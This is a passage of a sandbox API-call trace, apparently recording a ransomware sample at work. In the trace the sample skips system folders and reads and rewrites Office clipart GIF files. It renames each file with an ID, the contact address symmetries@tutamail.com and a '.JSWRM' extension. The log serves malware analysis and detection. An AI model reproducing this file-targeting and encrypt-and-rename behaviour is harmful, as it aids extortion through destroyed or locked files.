hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0100.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0100.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02187_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02187_.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02187_.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0100.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236468 [0100.105] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236ae0 | out: hHeap=0x1e0000) returned 1 [0100.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0100.105] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02187_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02187_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0100.105] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1401) returned 1 [0100.105] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.105] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x570) returned 0x2332c0 [0100.105] ReadFile (in: hFile=0x338, lpBuffer=0x2332c0, nNumberOfBytesToRead=0x570, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesRead=0x345e534*=0x570, lpOverlapped=0x0) returned 1 [0100.107] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.107] WriteFile (in: hFile=0x338, lpBuffer=0x2332c0*, nNumberOfBytesToWrite=0x570, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2332c0*, lpNumberOfBytesWritten=0x345e530*=0x570, lpOverlapped=0x0) returned 1 [0100.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2332c0 | out: hHeap=0x1e0000) returned 1 [0100.107] CloseHandle (hObject=0x338) returned 1 [0100.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0100.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0100.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0100.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0100.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0100.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0100.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0100.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0100.107] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02187_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02187_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02187_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02187_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0100.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0100.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0100.108] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x110a3267, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x110a3267, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110a3267, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4abc, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="WB02198_.GIF", cAlternateFileName="")) returned 1 [0100.108] lstrcmpiW (lpString1="WB02198_.GIF", lpString2=".") returned 1 [0100.108] lstrcmpiW (lpString1="WB02198_.GIF", lpString2="..") returned 1 [0100.108] lstrcmpiW (lpString1="WB02198_.GIF", lpString2="...") returned 1 [0100.108] lstrcmpiW (lpString1="WB02198_.GIF", lpString2="windows") returned -1 [0100.108] lstrcmpiW (lpString1="WB02198_.GIF", lpString2="recovery") returned 1 [0100.108] lstrcmpiW (lpString1="WB02198_.GIF", lpString2="perflogs") returned 1 [0100.108] lstrcmpiW (lpString1="WB02198_.GIF", lpString2="documents and settings") returned 1 [0100.108] lstrcmpiW (lpString1="WB02198_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0100.108] lstrcmpiW (lpString1="WB02198_.GIF", lpString2="system volume information") returned 1 [0100.108] lstrcmpiW (lpString1="WB02198_.GIF", lpString2="msocache") returned 1 [0100.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0100.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02198_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02198_.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02198_.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0100.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0100.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02198_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02198_.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02198_.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0100.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2368b8 [0100.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236468 | out: hHeap=0x1e0000) returned 1 [0100.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0100.109] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02198_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02198_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0100.109] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=19132) returned 1 [0100.109] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.110] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4ab0) returned 0x24d210 [0100.110] ReadFile (in: hFile=0x338, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4ab0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e534*=0x4ab0, lpOverlapped=0x0) returned 1 [0100.112] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.112] WriteFile (in: hFile=0x338, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4ab0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e530*=0x4ab0, lpOverlapped=0x0) returned 1 [0100.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.112] CloseHandle (hObject=0x338) returned 1 [0100.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0100.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.112] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0100.112] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0100.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0100.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0100.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23dee0 [0100.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0100.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0100.113] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02198_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02198_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02198_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02198_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dee0 | out: hHeap=0x1e0000) returned 1 [0100.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0100.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0100.113] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x110a3267, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x110a3267, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110a3267, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1653, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="WB02201_.GIF", cAlternateFileName="")) returned 1 [0100.114] lstrcmpiW (lpString1="WB02201_.GIF", lpString2=".") returned 1 [0100.114] lstrcmpiW (lpString1="WB02201_.GIF", lpString2="..") returned 1 [0100.114] lstrcmpiW (lpString1="WB02201_.GIF", lpString2="...") returned 1 [0100.114] lstrcmpiW (lpString1="WB02201_.GIF", lpString2="windows") returned -1 [0100.114] lstrcmpiW (lpString1="WB02201_.GIF", lpString2="recovery") returned 1 [0100.114] lstrcmpiW (lpString1="WB02201_.GIF", lpString2="perflogs") returned 1 [0100.114] lstrcmpiW (lpString1="WB02201_.GIF", lpString2="documents and settings") returned 1 [0100.114] lstrcmpiW (lpString1="WB02201_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0100.114] lstrcmpiW (lpString1="WB02201_.GIF", lpString2="system volume information") returned 1 [0100.114] lstrcmpiW (lpString1="WB02201_.GIF", lpString2="msocache") returned 1 [0100.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0100.114] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02201_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.114] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02201_.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02201_.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0100.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0100.114] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02201_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.114] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02201_.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02201_.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0100.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0100.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0100.114] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.114] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236188 [0100.114] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02201_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02201_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0100.115] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=5715) returned 1 [0100.115] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1650) returned 0x24d210 [0100.115] ReadFile (in: hFile=0x338, lpBuffer=0x24d210, nNumberOfBytesToRead=0x1650, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e534*=0x1650, lpOverlapped=0x0) returned 1 [0100.117] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0100.117] WriteFile (in: hFile=0x338, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x1650, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e530*=0x1650, lpOverlapped=0x0) returned 1 [0100.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0100.117] CloseHandle (hObject=0x338) returned 1 [0100.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0100.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0100.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0100.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0100.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0100.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0100.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0100.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0100.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0100.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0100.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0100.117] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0100.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0100.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0100.117] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02201_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02201_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02201_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02201_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0100.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0100.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0100.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236188 | out: hHeap=0x1e0000) returned 1 [0100.118] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x110a3267, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x110a3267, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x110c9494, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x136b, dwReserved0=0x60002, dwReserved1=0x241c82, cFileName="WB02214_.GIF", cAlternateFileName="")) returned 1 [0100.118] lstrcmpiW (lpString1="WB02214_.GIF", lpString2=".") returned 1 [0100.118] lstrcmpiW (lpString1="WB02214_.GIF", lpString2="..") returned 1 [0100.118] lstrcmpiW (lpString1="WB02214_.GIF", lpString2="...") returned 1 [0100.118] lstrcmpiW (lpString1="WB02214_.GIF", lpString2="windows") returned -1 [0100.118] lstrcmpiW (lpString1="WB02214_.GIF", lpString2="recovery") returned 1 [0100.118] lstrcmpiW (lpString1="WB02214_.GIF", lpString2="perflogs") returned 1 [0100.118] lstrcmpiW (lpString1="WB02214_.GIF", lpString2="documents and settings") returned 1 [0100.118] lstrcmpiW (lpString1="WB02214_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0100.118] lstrcmpiW (lpString1="WB02214_.GIF", lpString2="system volume information") returned 1 [0100.118] lstrcmpiW (lpString1="WB02214_.GIF", lpString2="msocache") returned 1 [0100.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0100.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02214_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02214_.GIF", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02214_.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0100.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0100.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02214_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0100.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB02214_.GIF", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB02214_.GIF", lpUsedDefaultChar=0x0) returned 12 [0100.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0100.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0100.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0100.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0100.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0100.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235bc8 [0100.119] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\WB02214_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\wb02214_.gif"), dwDesiredAccess=0xc0000000, 